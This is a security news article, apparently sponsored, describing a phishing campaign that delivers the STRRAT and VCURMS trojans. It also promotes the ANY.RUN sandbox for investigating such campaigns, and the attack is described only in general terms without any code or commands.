A new phishing campaign targets users with emails containing a button to “verify payment information.” Clicking the button triggers the download of a malicious JAR file (disguised as an invoice) that leverages a PowerShell command to download two additional JARs.
The JARs deploy the STRRAT and VCURMS RATs, granting attackers remote access and keylogging capabilities and credential theft from browsers, applications, Discord, Steam, etc. In contrast, VCURMS can also download further modules to expand its information-stealing functionality.
The attackers use AWS or Github to store the malware, obfuscate the initial JAR file, and employ commercial protection to bypass detection.
The Threat Intelligence Lookup feature of ANY.RUN allows you to investigate suspicious campaigns.
By crafting a query that combines specific rule names and domain names (e.g., “RuleName:”strrat” AND DomainName:”github.com””), analysts can identify relevant sandbox sessions where the suspicious behavior (STRRAT) was observed interacting with a particular domain (github.com).
The lookup presents two key results: a table with interactive analysis sessions (left side) that can be used to examine malware behavior in a safe environment and a list of malicious executables (right side) downloadable for further analysis or to check logs for potential compromises.
To learn more about the sample’s habits and extract more IOCs, let’s play back a recording of an online research session. To keep up with this research session, you may just browse to it.
ANY.RUN is a cloud-based sandbox environment for analyzing suspicious files. It utilizes YARA and Suricata rules to detect malware within 40 seconds of uploading.
Analysts can then directly interact with the sandboxed environment to observe malware behavior and collect indicators of compromise (IOCs), empowering security teams to collaboratively investigate threats and efficiently respond to emerging and persistent attacks.
The analysis begins by examining the tags in the ANY.RUN sandbox, which revealed the presence of STRRAT malware.
The Connections tab is used to identify a connection from javaw.exe to GitHub, potentially linking the sample to a more extensive campaign.
To collect IOCs, the user utilizes the dedicated IOC button within ANY.RUN, providing valuable information for security teams to update their systems and continue their investigation.
The session highlights ANY.RUN’s capability to extract malware configuration, automatically decrypt embedded strings, and reveal details like persistence mechanisms and Command & Control (C2) server locations saves analysts significant time and effort compared to manual reverse engineering.
Get a personalized demo of ANY.RUN for your team to see how it can benefit and contribute to your organization’s security – Schedule a call today.
A very important message from the Norwegian National Cyber Security Centre (NCSC) says that Secure Socket Layer/Transport Layer Security (SSL/TLS)…
Linux is widely used in numerous servers, cloud infrastructure, and Internet of Things devices, which makes it an attractive target…
ViperSoftX malware, known for stealing cryptocurrency information, now leverages Tesseract, an open-source OCR engine, to target infected systems, which extracts…
Santander has confirmed that there was a major data breach that affected its workers and customers in Spain, Uruguay, and…
The U.S. government has offered a prize of up to $5 million for information that leads to the arrest and…
Russia leverages a mix of state-backed Advanced Persistent Threat (APT) groups and financially motivated cybercriminals to achieve its strategic goals,…